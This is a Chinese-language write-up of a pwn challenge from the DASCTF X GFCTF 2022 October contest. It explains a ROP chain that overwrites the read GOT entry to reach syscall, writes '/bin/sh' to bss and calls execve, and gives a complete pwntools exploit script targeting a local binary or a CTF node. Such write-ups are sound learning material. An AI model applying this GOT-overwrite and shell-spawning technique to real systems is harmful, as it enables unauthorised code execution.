DASCTF X GFCTF 2022十月挑战赛 - pwn

DASCTF X GFCTF 2022十月挑战赛 - pwn

简单题，自己做了一下发现要比官方wp思路麻烦一点，所以这里就用官方wp的思路

高版本编译出来的，所以没有csu这种万能的gadget，果断看一下汇编

看完之后仔细思考了一下发现这里完全可以使用上面这些gadgets。
仔细看一下会发现可以控制rax，40116D 8B 44 24 0C mov eax, dword ptr [rsp+18h+buf]这里的地方，并且最后还可以控制ret
还有地方：40115A 48 89 C6 mov rsi, rax这里又可以通过rax来控制rsi
所以思路很好想出来，首先可以利用rax来控制rsi进行read任意写，再利用rax控制rsi到read_got这里进行任意地址写，写成syscall

这里笔者直接在本地做的就直接打本地了，远程需要爆破一下最后的这个字节
这样的话再调用read的时候就会调用syscall了
这个时候我们把rax设置成0x3b也就是execve，控制rdi为bin_sh，把rsi和rdx置为0，最后直接调用read就可以getshell了
但是程序里没有可以直接控制rdi的，所以我们rop gadget看一下

发现了这一个gadget，而404018正好是bss的地址，可读可写，所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh
rdx在read上面时会被赋值为dword ptr [rsp+18h+buf]，所以在写got表的时候将这里设置成指向0的地址即可

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote('node4.buuoj.cn', 29736)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

r.send(p32(0x100))

bss_addr = 0x404018

# mov     eax, dword ptr [rsp+18h+buf]; add     rsp, 18h; retn
mov_rax_rsp_add_rsp = 0x40116D

call_read = 0x40115A

mov_rdi_404018_jump_rax = 0x0000000000401099

read_got = elf.got['read']

ret = 0x401175

lea_rsi = 0x401141

p1 = b'a' * 0x10 + p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(bss_addr) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(read_got) + p64(0) + p64(call_read)
p1 += p64(0) + p32(0) + p32(bss_addr + 8) + p64(0) + p64(mov_rax_rsp_add_rsp)

p1 += p64(0) + p32(0) + p32(ret) + p64(0) + p64(mov_rdi_404018_jump_rax)
p1 += p64(mov_rax_rsp_add_rsp) + p64(0) + p32(0) + p32(0x3b) + p64(0) + p64(lea_rsi)
p1 += p64(0) + p32(0) + p32(0) + p64(0)

r.send(p1)

r.send('/bin/sh\x00')
r.send('\x60')

r.interactive()